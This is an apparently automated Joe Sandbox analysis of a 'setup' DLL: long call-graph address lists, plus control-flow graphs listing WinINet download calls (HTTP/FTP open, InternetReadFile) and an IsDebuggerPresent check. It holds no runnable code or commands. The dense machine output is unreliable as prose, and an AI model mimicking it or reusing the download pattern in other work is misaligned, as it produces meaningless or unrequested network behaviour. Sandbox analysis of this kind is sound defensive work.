100057a0 53 API calls 20409->20410 20411 10009a2c 20410->20411 20476 10001680 20411->20476 20417 10009a4c 20549 10015d38 20417->20549 20419 10009a5f 20557 10013cf0 20420->20557 20429 100057a0 53 API calls 20430 100012c9 20429->20430 20431 100057a0 53 API calls 20430->20431 20432 100012ec 20431->20432 20569 1000b300 20432->20569 20435 10009720 20436 10004cc0 53 API calls 20435->20436 20437 10009767 20436->20437 20438 10004cc0 53 API calls 20437->20438 20439 10009785 20438->20439 20440 10004cc0 53 API calls 20439->20440 20441 100097ac 20440->20441 20442 10004cc0 53 API calls 20441->20442 20443 100097cb 20442->20443 20444 10004cc0 53 API calls 20443->20444 20445 100097ea 20444->20445 20446 10004cc0 53 API calls 20445->20446 20447 1000980c 20446->20447 20448 10004cc0 53 API calls 20447->20448 20449 1000982e 20448->20449 20449->20401 20451 100052c3 20450->20451 20452 100052cc 20451->20452 20650 1001622f GetModuleHandleA GetProcAddress @x64toa_s@24 20451->20650 20455 100052e8 20452->20455 20461 10005330 20452->20461 20651 1001622f GetModuleHandleA GetProcAddress @x64toa_s@24 20452->20651 20456 100052ee 20455->20456 20455->20461 20652 10005430 44 API calls moneypunct 20456->20652 20457 100053ac 20457->20403 20459 100052fc 20459->20403 20460 1001622f GetModuleHandleA GetProcAddress 20460->20461 20461->20457 20461->20460 20653 10006140 53 API calls 3 library calls 20461->20653 20654 10006460 53 API calls 20463->20654 20465 100053d8 20465->20405 20465->20465 20469 100057b1 20466->20469 20467 100057ef 20655 100058d0 53 API calls 20467->20655 20469->20467 20471 100057d0 20469->20471 20470 100057fb 20475 1000581b 20470->20475 20656 10016277 43 API calls 2 library calls 20470->20656 20472 10004cc0 53 API calls 20471->20472 20473 100057ea 20472->20473 20473->20407 20475->20407 20477 100016c3 20476->20477 20479 100016d0 20477->20479 20661 1001622f GetModuleHandleA GetProcAddress @x64toa_s@24 20477->20661 20480 100016e6 20479->20480 20662 1001622f GetModuleHandleA GetProcAddress @x64toa_s@24 20479->20662 20657 10007fc0 20480->20657 20484 100017fb 20486 10001810 20484->20486 20667 10016244 44 API calls 2 library calls 20484->20667 20485 10016350 std::locale::facet::facet_Register 52 API calls 20487 10001713 20485->20487 20490 10001835 20486->20490 20668 10016244 44 API calls 2 library calls 20486->20668 20492 100017c2 20487->20492 20493 10004cc0 53 API calls 20487->20493 20494 1000185b 20490->20494 20669 10016244 44 API calls 2 library calls 20490->20669 20664 10004940 53 API calls moneypunct 20492->20664 20496 10001750 20493->20496 20506 100022c0 20494->20506 20498 10004cc0 53 API calls 20496->20498 20497 100017d9 20665 10004940 53 API calls moneypunct 20497->20665 20499 10001787 20498->20499 20501 10004cc0 53 API calls 20499->20501 20503 100017b4 20501->20503 20502 100017e7 20666 10001540 53 API calls 20502->20666 20663 1000b580 80 API calls moneypunct 20503->20663 20508 10002308 20506->20508 20507 10002332 20670 10004650 20507->20670 20508->20507 20547 10002318 20508->20547 20778 10011140 59 API calls 2 library calls 20508->20778 20511 10015d38 __atodbl_l 5 API calls 20513 1000265f 20511->20513 20548 10001380 53 API calls moneypunct 20513->20548 20515 10002340 20516 1000235a 20515->20516 20721 10001e00 20515->20721 20516->20547 20786 10011140 59 API calls 2 library calls 20516->20786 20520 10002355 20779 100037a0 GetLastError 20520->20779 20521 10002376 GetTickCount 20725 10005580 20521->20725 20524 100023b9 20735 100035a0 20524->20735 20530 10002624 20531 10002639 20530->20531 20532 1000262b InternetCloseHandle 20530->20532 20795 10001c60 53 API calls 20531->20795 20532->20531 20537 10002a20 156 API calls 20538 100023e6 20537->20538 20538->20530 20538->20537 20539 10004cc0 53 API calls 20538->20539 20540 1001622f GetModuleHandleA GetProcAddress 20538->20540 20544 100025ea 20538->20544 20546 1000b740 53 API calls 20538->20546 20788 100048b0 53 API calls 20538->20788 20789 1000b850 53 API calls 2 library calls 20538->20789 20790 10004810 53 API calls 20538->20790 20791 1000b580 80 API calls moneypunct 20538->20791 20792 100047e0 53 API calls 20538->20792 20793 10002670 178 API calls 2 library calls 20538->20793 20539->20538 20540->20538 20794 10001ec0 InternetCloseHandle 20544->20794 20546->20538 20547->20511 20548->20417 20550 10015d40 20549->20550 20551 10015d42 IsDebuggerPresent 20549->20551 20550->20419 20937 1001b266 20551->20937 20554 10019e15 SetUnhandledExceptionFilter UnhandledExceptionFilter 20555 10019e32 __invoke_watson 20554->20555 20556 10019e3a GetCurrentProcess TerminateProcess 20554->20556 20555->20556 20556->20419 20588 10016350 20557->20588 20560 100141b0 20561 10016350 std::locale::facet::facet_Register 52 API calls 20560->20561 20562 10001246 20561->20562 20563 10005b20 20562->20563 20564 10016350 std::locale::facet::facet_Register 52 API calls 20563->20564 20565 1000126b 20564->20565 20566 100054f0 20565->20566 20567 10016350 std::locale::facet::facet_Register 52 API calls 20566->20567 20568 10001290 20567->20568 20568->20429 20632 10004cc0 20569->20632 20571 1000b3aa 20572 10004cc0 53 API calls 20571->20572 20573 1000b3b8 20572->20573 20574 100057a0 53 API calls 20573->20574 20575 1000b3cc 20574->20575 20576 100057a0 53 API calls 20575->20576 20577 1000b3db 20576->20577 20578 100057a0 53 API calls 20577->20578 20579 1000b3e9 20578->20579 20580 100057a0 53 API calls 20579->20580 20581 1000b3fa 20580->20581 20582 100057a0 53 API calls 20581->20582 20583 1000b40b 20582->20583 20584 1000b43d 20583->20584 20644 10016244 44 API calls 2 library calls 20583->20644 20586 100012fc 20584->20586 20645 10016244 44 API calls 2 library calls 20584->20645 20586->20435 20591 10016358 20588->20591 20590 10001220 20590->20560 20591->20590 20595 10016374 std::locale::facet::facet_Register 20591->20595 20600 1001a269 20591->20600 20619 1001b4e2 GetModuleHandleA GetProcAddress __decode_pointer 20591->20619 20594 100163a4 20622 100172fb RaiseException 20594->20622 20599 1001639a 20595->20599 20620 10016841 51 API calls __cinit 20595->20620 20598 100163b9 20621 10015e19 43 API calls 3 library calls 20599->20621 20601 1001a316 20600->20601 20606 1001a277 20600->20606 20630 1001b4e2 GetModuleHandleA GetProcAddress __decode_pointer 20601->20630 20603 1001a28c 20603->20606 20623 10023c70 43 API calls 2 library calls 20603->20623 20624 10023ad0 43 API calls 7 library calls 20603->20624 20625 1001ac48 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 20603->20625 20604 1001a31c 20631 100177c4 43 API calls __getptd_noexit 20604->20631 20606->20603 20611 1001a2da RtlAllocateHeap 20606->20611 20613 1001a30d 20606->20613 20614 1001a301 20606->20614 20617 1001a2ff 20606->20617 20626 1001a21a 43 API calls 4 library calls 20606->20626 20627 1001b4e2 GetModuleHandleA GetProcAddress __decode_pointer 20606->20627 20608 1001a322 20608->20591 20611->20606 20613->20591 20628 100177c4 43 API calls __getptd_noexit 20614->20628 20629 100177c4 43 API calls __getptd_noexit 20617->20629 20619->20591 20620->20599 20621->20594 20622->20598 20623->20603 20624->20603 20626->20606 20627->20606 20628->20617 20629->20613 20630->20604 20631->20608 20633 10004cd1 20632->20633 20634 10004d06 20633->20634 20635 10004ce9 20633->20635 20648 100058d0 53 API calls 20634->20648 20646 10005840 43 API calls _memmove_s 20635->20646 20638 10004cf4 20647 10005840 43 API calls _memmove_s 20638->20647 20640 10004d48 20640->20571 20641 10004cfd 20641->20571 20642 10004d0d 20642->20640 20649 10016277 43 API calls 2 library calls 20642->20649 20644->20584 20645->20586 20646->20638 20647->20641 20648->20642 20649->20640 20650->20452 20651->20455 20652->20459 20653->20461 20654->20465 20655->20470 20656->20475 20660 10007fd0 20657->20660 20658 1001622f GetModuleHandleA GetProcAddress 20658->20660 20659 100016fc 20659->20484 20659->20485 20660->20658 20660->20659 20661->20479 20662->20480 20663->20492 20664->20497 20665->20502 20666->20484 20667->20486 20668->20490 20669->20494 20796 10001d10 20670->20796 20673 10002338 20691 10001f10 20673->20691 20674 10001e00 InternetOpenW 20675 1000466d 20674->20675 20676 10004753 20675->20676 20678 10005580 std::locale::_Locimp::_Locimp 53 API calls 20675->20678 20677 10001d10 53 API calls 20676->20677 20679 10004759 20677->20679 20680 100046a7 20678->20680 20679->20673 20805 10001b00 53 API calls moneypunct 20679->20805 20681 100035a0 90 API calls 20680->20681 20683 100046af 20681->20683 20684 100034c0 57 API calls 20683->20684 20689 100046b6 20684->20689 20685 1001622f GetModuleHandleA GetProcAddress 20685->20689 20688 100057a0 53 API calls 20688->20689 20689->20676 20689->20685 20689->20688 20802 100048b0 53 API calls 20689->20802 20803 10008b30 53 API calls 2 library calls 20689->20803 20804 10003a90 95 API calls 2 library calls 20689->20804 20692 10001f44 20691->20692 20693 10001f4f 20692->20693 20694 10005580 std::locale::_Locimp::_Locimp 53 API calls 20692->20694 20693->20515 20695 10001f91 20694->20695 20696 100035a0 90 API calls 20695->20696 20697 10001f99 20696->20697 20698 100034c0 57 API calls 20697->20698 20699 10001fa0 20698->20699 20700 10001e00 InternetOpenW 20699->20700 20701 10001fac 20700->20701 20702 10001fb0 20701->20702 20719 10001fcf 20701->20719 20703 100037a0 56 API calls 20702->20703 20704 10001fb5 20703->20704 20704->20515 20705 10002278 20706 1000227f InternetCloseHandle 20705->20706 20708 1000228d 20705->20708 20706->20708 20707 10005580 std::locale::_Locimp::_Locimp 53 API calls 20707->20719 20708->20515 20709 100035a0 90 API calls 20709->20719 20710 100034c0 57 API calls 20710->20719 20711 1001622f GetModuleHandleA GetProcAddress 20711->20719 20718 10004cc0 53 API calls 20718->20719 20719->20705 20719->20707 20719->20709 20719->20710 20719->20711 20719->20718 20808 10014bc0 20719->20808 20864 10015270 20719->20864 20871 100048b0 53 API calls 20719->20871 20872 1000b850 53 API calls 2 library calls 20719->20872 20873 1000b800 53 API calls 20719->20873 20874 1000fc80 57 API calls 2 library calls 20719->20874 20875 10002670 178 API calls 2 library calls 20719->20875 20722 10001e0a InternetOpenW 20721->20722 20724 10001e62 20721->20724 20722->20724 20724->20520 20724->20521 20727 10005590 20725->20727 20726 100055cf 20730 100055f1 20726->20730 20911 10006c60 53 API calls 6 library calls 20726->20911 20727->20726 20729 100055b2 20727->20729 20910 10004b60 53 API calls 2 library calls 20729->20910 20734 10005605 20730->20734 20912 10016277 43 API calls 2 library calls 20730->20912 20732 100055c9 20732->20524 20734->20524 20736 1000372e 20735->20736 20737 1000361e 20735->20737 20920 10004b60 53 API calls 2 library calls 20736->20920 20913 10004b60 53 API calls 2 library calls 20737->20913 20740 1000362b 20914 1000fdb0 54 API calls 2 library calls 20740->20914 20741 1000373b 20921 1000ca30 54 API calls moneypunct 20741->20921 20744 1000363b 20746 10004cc0 53 API calls 20744->20746 20745 10003742 20766 100036d3 20745->20766 20922 10016244 44 API calls 2 library calls 20745->20922 20748 1000364c 20746->20748 20750 10003666 20748->20750 20915 10016244 44 API calls 2 library calls 20748->20915 20749 1000377a 20752 10015d38 __atodbl_l 5 API calls 20749->20752 20916 10015f0e 53 API calls _strtol 20750->20916 20755 100023c1 20752->20755 20770 100034c0 20755->20770 20756 1000367d 20757 100036e0 20756->20757 20758 10003684 20756->20758 20759 10004cc0 53 API calls 20757->20759 20760 10005580 std::locale::_Locimp::_Locimp 53 API calls 20758->20760 20761 100036fd 20759->20761 20762 100036b0 20760->20762 20761->20766 20919 10016244 44 API calls 2 library calls 20761->20919 20763 100035a0 90 API calls 20762->20763 20765 100036b8 20763->20765 20917 1000cc80 81 API calls 2 library calls 20765->20917 20766->20749 20923 10016244 44 API calls 2 library calls 20766->20923 20768 100036bf 20768->20766 20918 10016244 44 API calls 2 library calls 20768->20918 20771 100034f0 20770->20771 20772 1000351e 20770->20772 20773 10004cc0 53 API calls 20771->20773 20774 100023c8 20772->20774 20925 10016244 44 API calls 2 library calls 20772->20925 20775 10003513 20773->20775 20774->20538 20787 10011140 59 API calls 2 library calls 20774->20787 20924 10010fe0 57 API calls 2 library calls 20775->20924 20778->20507 20926 1000bd60 20779->20926 20782 10004cc0 53 API calls 20783 100037ec 20782->20783 20785 100037fd 20783->20785 20936 10016244 44 API calls 2 library calls 20783->20936 20785->20516 20786->20547 20787->20538 20788->20538 20789->20538 20790->20538 20791->20538 20792->20538 20793->20538 20794->20547 20795->20547 20797 10001d20 20796->20797 20798 10001d71 20797->20798 20801 1001622f GetModuleHandleA GetProcAddress 20797->20801 20806 100048b0 53 API calls 20797->20806 20807 10008b30 53 API calls 2 library calls 20797->20807 20798->20673 20798->20674 20801->20797 20802->20689 20803->20689 20804->20689 20805->20673 20806->20797 20807->20797 20876 10014a60 20808->20876 20811 10015048 20813 10015d38 __atodbl_l 5 API calls 20811->20813 20812 10014c33 20816 100057a0 53 API calls 20812->20816 20814 1001511c 20813->20814 20814->20719 20815 10014d0a 20817 100057a0 53 API calls 20815->20817 20818 10014c7d 20816->20818 20819 10014d6d 20817->20819 20820 10007ef0 53 API calls 20818->20820 20881 10007ef0 20819->20881 20822 10014cad 20820->20822 20823 10014cc2 20822->20823 20824 10014cc9 FtpOpenFileW 20822->20824 20823->20824 20824->20811 20825 10014cf5 20824->20825 20891 10016244 44 API calls 2 library calls 20825->20891 20827 10014d02 20827->20811 20829 10014da0 HttpOpenRequestW 20830 10014dfc HttpSendRequestW 20829->20830 20831 10014f00 HttpQueryInfoW 20830->20831 20832 10014e17 GetLastError 20830->20832 20833 10015052 20831->20833 20839 10014e27 20831->20839 20832->20839 20899 10004850 44 API calls moneypunct 20833->20899 20835 10015031 20835->20811 20898 10016244 44 API calls 2 library calls 20835->20898 20836 10014ec0 InternetQueryOptionW 20836->20839 20837 100150ea 20906 10004850 44 API calls moneypunct 20837->20906 20838 10014e4b GetDesktopWindow 20838->20839 20839->20830 20839->20835 20839->20836 20839->20838 20840 10015065 20839->20840 20843 100150a6 20839->20843 20844 10014fcd GetDesktopWindow 20839->20844 20848 10014ff0 20839->20848 20892 10004770 53 API calls std::locale::_Locimp::_Locimp 20839->20892 20893 10014550 53 API calls std::locale::_Locimp::_Locimp 20839->20893 20894 100172fb RaiseException 20839->20894 20900 10004770 53 API calls std::locale::_Locimp::_Locimp 20840->20900 20843->20837 20903 1000cc10 53 API calls 2 library calls 20843->20903 20844->20839 20847 100150c8 20904 10014650 53 API calls std::locale::_Locimp::_Locimp 20847->20904 20895 10004770 53 API calls std::locale::_Locimp::_Locimp 20848->20895 20849 1001507d 20901 10014550 53 API calls std::locale::_Locimp::_Locimp 20849->20901 20852 100150db 20905 100172fb RaiseException 20852->20905 20853 10015097 20902 100172fb RaiseException 20853->20902 20858 10015008 20896 10014550 53 API calls std::locale::_Locimp::_Locimp 20858->20896 20861 10015022 20897 100172fb RaiseException 20861->20897 20865 1001529f HttpQueryInfoW 20864->20865 20866 1001527f FtpGetFileSize 20864->20866 20867 100152e3 20865->20867 20868 100152d6 20865->20868 20866->20867 20869 100152f7 InternetCloseHandle 20867->20869 20870 100152fa 20867->20870 20868->20719 20869->20870 20870->20719 20871->20719 20872->20719 20873->20719 20874->20719 20875->20719 20880 10014a6a 20876->20880 20877 10014b6f InternetConnectW 20878 10015d38 __atodbl_l 5 API calls 20877->20878 20879 10014bb1 20878->20879 20879->20811 20879->20812 20879->20815 20880->20877 20882 10007f09 20881->20882 20883 10007f43 20882->20883 20884 10007f28 20882->20884 20890 10007f96 20883->20890 20908 100058d0 53 API calls 20883->20908 20907 100056e0 53 API calls _memcpy_s 20884->20907 20887 10007f3c 20887->20829 20888 10007f6b 20888->20890 20909 10016277 43 API calls 2 library calls 20888->20909 20890->20829 20891->20827 20892->20839 20893->20839 20894->20839 20895->20858 20896->20861 20897->20835 20898->20811 20899->20811 20900->20849 20901->20853 20902->20843 20903->20847 20904->20852 20905->20837 20906->20811 20907->20887 20908->20888 20909->20890 20910->20732 20911->20730 20912->20734 20913->20740 20914->20744 20915->20750 20916->20756 20917->20768 20918->20766 20919->20766 20920->20741 20921->20745 20922->20766 20923->20749 20924->20772 20925->20774 20927 1000bd90 _memset 20926->20927 20928 1000bdc6 20927->20928 20929 1000bda8 GetModuleHandleW 20927->20929 20930 1000bdd8 FormatMessageW 20928->20930 20929->20930 20931 1000be00 20930->20931 20931->20931 20932 100057a0 53 API calls 20931->20932 20933 1000be1a 20932->20933 20934 10015d38 __atodbl_l 5 API calls 20933->20934 20935 100037d8 20934->20935 20935->20782 20936->20785 20937->20554 21497 10001ee0 190 API calls 21499 1000e6e0 47 API calls moneypunct 21454 100119e0 57 API calls 2 library calls 21099 1001bce7 21100 1001bd23 21099->21100 21133 1001bd1c 21099->21133 21101 1001bd27 21100->21101 21102 1001bd4e 21100->21102 21173 100177d7 43 API calls __getptd_noexit 21101->21173 21105 1001bdb8 21102->21105 21106 1001bd92 21102->21106 21104 10015d38 __atodbl_l 5 API calls 21108 1001c2a5 21104->21108 21110 1001bdcd 21105->21110 21111 1001bdbe 21105->21111 21176 100177d7 43 API calls __getptd_noexit 21106->21176 21107 1001bd2c 21174 100177c4 43 API calls __getptd_noexit 21107->21174 21163 100258c3 21110->21163 21179 100256e3 45 API calls 3 library calls 21111->21179 21113 1001bd97 21177 100177c4 43 API calls __getptd_noexit 21113->21177 21115 1001bd33 21175 1001620b GetModuleHandleA GetProcAddress __invoke_watson __decode_pointer 21115->21175 21117 1001bdd3 21121 1001bfd2 21117->21121 21126 1001a7f6 ____lc_codepage_func 43 API calls 21117->21126 21119 1001bdca 21119->21110 21124 1001bfe0 21121->21124 21125 1001c205 WriteFile 21121->21125 21122 1001bda0 21178 1001620b GetModuleHandleA GetProcAddress __invoke_watson __decode_pointer 21122->21178 21128 1001c083 21124->21128 21134 1001bff2 21124->21134 21127 1001c22c GetLastError 21125->21127 21138 1001bfcd 21125->21138 21130 1001bdee GetConsoleMode 21126->21130 21127->21138 21131 1001c08d 21128->21131 21141 1001c12a 21128->21141 21129 1001c266 21129->21133 21183 100177c4 43 API calls __getptd_noexit 21129->21183 21130->21121 21132 1001be12 21130->21132 21131->21129 21143 1001c0e0 WriteFile 21131->21143 21132->21121 21137 1001be20 GetConsoleCP 21132->21137 21133->21104 21134->21129 21135 1001c03d WriteFile 21134->21135 21135->21127 21139 1001c062 21135->21139 21137->21138 21158 1001be40 21137->21158 21138->21129 21138->21133 21142 1001c246 21138->21142 21139->21134 21139->21138 21149 1001c07e 21139->21149 21140 1001c180 WideCharToMultiByte 21140->21127 21146 1001c1b3 WriteFile 21140->21146 21141->21129 21141->21140 21144 1001c25b 21142->21144 21145 1001c24e 21142->21145 21143->21127 21147 1001c105 21143->21147 21182 100177ea 43 API calls 3 library calls 21144->21182 21181 100177c4 43 API calls __getptd_noexit 21145->21181 21151 1001c1e1 GetLastError 21146->21151 21155 1001c1d8 21146->21155 21147->21131 21147->21138 21147->21149 21149->21138 21151->21155 21153 1001c253 21184 100177d7 43 API calls __getptd_noexit 21153->21184 21155->21138 21155->21141 21155->21146 21155->21149 21156 10025af6 47 API calls __write_nolock 21156->21158 21157 1001beb8 WideCharToMultiByte 21157->21138 21160 1001bee6 WriteFile 21157->21160 21158->21138 21158->21156 21158->21157 21159 1001bf07 21158->21159 21180 10025b43 45 API calls __isleadbyte_l 21158->21180 21159->21127 21159->21138 21159->21158 21161 10025921 11 API calls __putwch_nolock 21159->21161 21162 1001bf1f WriteFile 21159->21162 21160->21127 21160->21159 21161->21159 21162->21127 21162->21159 21164 100258cc 21163->21164 21166 100258da 21163->21166 21185 100177c4 43 API calls __getptd_noexit 21164->21185 21168 10025905 21166->21168 21186 100177c4 43 API calls __getptd_noexit 21166->21186 21167 100258d1 21167->21117 21168->21117 21170 100258ee 21187 1001620b GetModuleHandleA GetProcAddress __invoke_watson __decode_pointer 21170->21187 21173->21107 21174->21115 21176->21113 21177->21122 21179->21119 21180->21158 21181->21153 21182->21133 21183->21153 21184->21133 21185->21167 21186->21170 21456 1000d5e8 55 API calls 3 library calls 21549 1001f7e8 44 API calls 2 library calls 21457 100169ed RtlLeaveCriticalSection _doexit 21502 100092f0 79 API calls 21551 1000a3f0 180 API calls 21552 1000c3f0 53 API calls __Towlower 21503 1002bef0 79 API calls __cinit 21553 10020bf4 57 API calls 4 library calls

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 165 10002a20-10002a78 call 100153a4 168 10002a93-10002ada call 10005580 call 100035a0 call 100034c0 165->168 169 10002a7a-10002a8e call 1000b800 call 1000fc80 165->169 179 10002b31-10002b5c call 10014bc0 168->179 180 10002adc-10002b11 call 10005580 call 10012600 168->180 169->168 185 10002bdd-10002c08 call 10004cc0 179->185 186 10002b5e-10002b60 179->186 195 10002b13-10002b1c call 100115a0 180->195 196 10002b1f-10002b23 180->196 201 10002c0a 185->201 202 10002c0d-10002c28 call 10016480 185->202 188 10002b62-10002b71 186->188 189 10002b7a 186->189 188->189 192 10002b73-10002b78 188->192 193 10002b7c-10002b84 189->193 192->193 199 10002b91-10002bd8 call 10005580 call 100035a0 call 100034c0 call 100037a0 call 1001623f 193->199 200 10002b86-10002b8f call 10011140 193->200 195->196 196->179 198 10002b25-10002b2e call 10016244 196->198 198->179 242 10002daf 199->242 200->199 201->202 212 10002c36-10002c3a 202->212 213 10002c2a-10002c33 call 10016244 202->213 217 10002dd0-10002e36 call 10005580 call 100035a0 call 100034c0 212->217 218 10002c40-10002c43 212->218 213->212 253 10002e38-10002e40 217->253 254 10002e9b-10002ea6 call 10003550 217->254 221 10002c45-10002c54 218->221 222 10002c5d 218->222 221->222 225 10002c56-10002c5b 221->225 226 10002c5f-10002c67 222->226 225->226 228 10002c76-10002cdd call 10005580 call 100035a0 call 10007d10 call 10007dc0 226->228 229 10002c69-10002c73 call 10011140 226->229 258 10002cee-10002d0c 228->258 259 10002cdf-10002ceb call 10016244 228->259 229->228 244 10002db2 242->244 247 10002db4-10002dcf call 10015d38 244->247 253->254 257 10002e42-10002e77 call 10005580 call 10012600 253->257 267 10002fe1-10002fe6 254->267 268 10002eac-10002ed7 InternetReadFile 254->268 291 10002e85-10002e8d 257->291 292 10002e79-10002e82 call 100115a0 257->292 263 10002d1d-10002d8a call 10004cc0 call 100034c0 call 10004cc0 call 10003820 call 1001623f 258->263 264 10002d0e-10002d1a call 10016244 258->264 259->258 334 10002d98-10002da7 263->334 335 10002d8c-10002d95 call 10016244 263->335 264->263 276 10002ff1-10003006 call 10015230 call 1001623f 267->276 277 10002fe8-10002fee call 100166ad 267->277 273 10003018-1000302b 268->273 274 10002edd-10002edf 268->274 284 10003031-10003039 273->284 285 1000302d 273->285 281 100030a5-100030f8 call 100031f0 call 100032d0 call 10003460 call 10004770 call 100035a0 call 100034c0 call 10003550 274->281 282 10002ee5-10002f09 call 100165ad 274->282 311 10003011 276->311 312 10003008-1000300e call 100166ad 276->312 277->276 369 10003103-10003120 call 10015230 call 1001623f 281->369 370 100030fa-10003100 call 100166ad 281->370 321 10002f55-10002f5f 282->321 322 10002f0b-10002f16 282->322 293 10003046-10003079 call 10004770 call 100035a0 call 100034c0 call 100037a0 284->293 294 1000303b-10003041 call 10011140 284->294 285->284 291->254 302 10002e8f-10002e98 call 10016244 291->302 292->291 347 10003084-10003099 call 10015230 call 1001623f 293->347 348 1000307b-10003081 call 100166ad 293->348 294->293 302->254 311->273 312->311 338 10002f61-10002f70 call 100032d0 321->338 339 10002f76-10002f80 321->339 322->321 327 10002f18-10002f4f call 1000ff00 322->327 327->321 334->244 343 10002da9-10002daa call 100166ad 334->343 335->334 338->339 352 10002fd0-10002fdb call 10003550 339->352 353 10002f82-10002f8c 339->353 343->242 347->244 368 1000309f 347->368 348->347 352->267 352->268 353->352 357 10002f8e-10002fcb call 10010640 353->357 357->352 368->281 369->311 378 10003126-10003131 call 100166ad 369->378 370->369 378->247
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 10004CC0: _memcpy_s.LIBCMT ref: 10004D43
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,?,?), ref: 10002EBF
                                                                                                                                                                                                                                                                          • _fwrite.LIBCMT ref: 10002EED
                                                                                                                                                                                                                                                                            • Part of subcall function 10005580: _memcpy_s.LIBCMT ref: 10005621
                                                                                                                                                                                                                                                                            • Part of subcall function 100115A0: GetWindowLongW.USER32(?,000000F0), ref: 100115A4
                                                                                                                                                                                                                                                                            • Part of subcall function 100115A0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 100115BA
                                                                                                                                                                                                                                                                            • Part of subcall function 100115A0: SendMessageW.USER32(?,0000040A,00000001,0000001E), ref: 100115CA
                                                                                                                                                                                                                                                                            • Part of subcall function 100032D0: GetTickCount.KERNEL32 ref: 100032E7
                                                                                                                                                                                                                                                                            • Part of subcall function 10003460: GetTickCount.KERNEL32 ref: 10003469
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CountLongTickWindow_memcpy_s$FileInternetMessageReadSend_fwrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 299267306-0
                                                                                                                                                                                                                                                                          • Opcode ID: feed1562f7a792029a53d8156ffc233382bdec311974261d537cb2be834ca5da
                                                                                                                                                                                                                                                                          • Instruction ID: c8d4544e754c25669b4337e797654c03def6fb5cbee6d32e7e648880c0cb9aee
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: feed1562f7a792029a53d8156ffc233382bdec311974261d537cb2be834ca5da
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03228275D00214ABEF04DFA8CC85B9EBBB5EF48340F14816DF819AB246DB35AD45CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 10014bc0-10014c20 call 10014a60 3 10014c26-10014c2d 0->3 4 1001504b-1001504d 0->4 6 10014c33-10014c58 3->6 7 10014d0a-10014d16 3->7 5 100150fc-10015122 call 10015d38 4->5 10 10014c60-10014c69 6->10 8 10014d28-10014d4f 7->8 9 10014d18-10014d21 7->9 13 10014d50-10014d59 8->13 9->8 12 10014d23 9->12 10->10 14 10014c6b-10014c8f call 100057a0 10->14 12->8 13->13 16 10014d5b-10014d80 call 100057a0 13->16 21 10014c90-10014c99 14->21 22 10014d83-10014d8c 16->22 21->21 23 10014c9b-10014cc0 call 10007ef0 21->23 22->22 24 10014d8e-10014da4 call 10007ef0 22->24 29 10014cc2 23->29 30 10014cc9-10014cef FtpOpenFileW 23->30 31 10014db6 24->31 32 10014da6-10014daa 24->32 29->30 33 10014cf5-10014d05 call 10016244 30->33 34 100150f6 30->34 38 10014db8-10014dc7 31->38 35 10014db1-10014db4 32->35 36 10014dac-10014daf 32->36 33->34 34->5 35->38 36->38 40 10014dd0-10014df6 HttpOpenRequestW 38->40 41 10014dc9 38->41 42 10014dfc-10014e11 HttpSendRequestW 40->42 41->40 43 10014f00-10014f33 HttpQueryInfoW 42->43 44 10014e17-10014e25 GetLastError 42->44 45 10015052-10015060 call 10004850 43->45 46 10014f39-10014f42 43->46 47 10014e27-10014e2d 44->47 48 10014e3b-10014e40 44->48 45->5 49 100150a6-100150ab 46->49 50 10014f48-10014f4e 46->50 47->48 52 10014e2f-10014e35 47->52 53 10014e42-10014e49 48->53 54 10014eb7-10014eba 48->54 60 100150ea-100150f1 call 10004850 49->60 61 100150ad-100150b2 49->61 55 10014f50-10014f56 50->55 56 10014f58-10014f5d 50->56 52->48 58 10015031-10015039 52->58 62 10014e51-10014e62 53->62 63 10014e4b GetDesktopWindow 53->63 54->58 59 10014ec0-10014efb InternetQueryOptionW 54->59 55->56 65 10014fc4-10014fcb 55->65 66 10014f63-10014f74 56->66 67 10015065-100150a1 call 10015230 call 10004770 call 10014550 call 100172fb 56->67 58->4 69 1001503b-10015048 call 10016244 58->69 59->42 60->34 61->60 64 100150b4-100150e5 call 10015230 call 1000cc10 call 10014650 call 100172fb 61->64 62->42 81 10014e64-10014e69 62->81 63->62 64->60 74 10014fd3-10014fea 65->74 75 10014fcd GetDesktopWindow 65->75 76 10014f76-10014f7c 66->76 77 10014f7e 66->77 67->49 69->4 74->42 90 10014ff0-1001502c call 10015230 call 10004770 call 10014550 call 100172fb 74->90 75->74 82 10014f84-10014f9d 76->82 77->82 81->42 85 10014e6b-10014e70 81->85 97 10014fa7 82->97 98 10014f9f-10014fa5 82->98 85->58 89 10014e76-10014eb2 call 10015230 call 10004770 call 10014550 call 100172fb 85->89 89->54 90->58 103 10014fad-10014fbf 97->103 98->103 103->42
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 10014A60: InternetConnectW.WININET(?,?,?,?,?,?,?,00000000), ref: 10014B94
                                                                                                                                                                                                                                                                          • FtpOpenFileW.WININET(?,?,80000000,80000002,00000000), ref: 10014CDC
                                                                                                                                                                                                                                                                          • HttpOpenRequestW.WININET(?,HEAD,?,00000000,00000000,?,84400000,00000000), ref: 10014DE4
                                                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(?,00000000,00000000,00000000,00000000), ref: 10014E09
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?), ref: 10014E17
                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 10014E4B
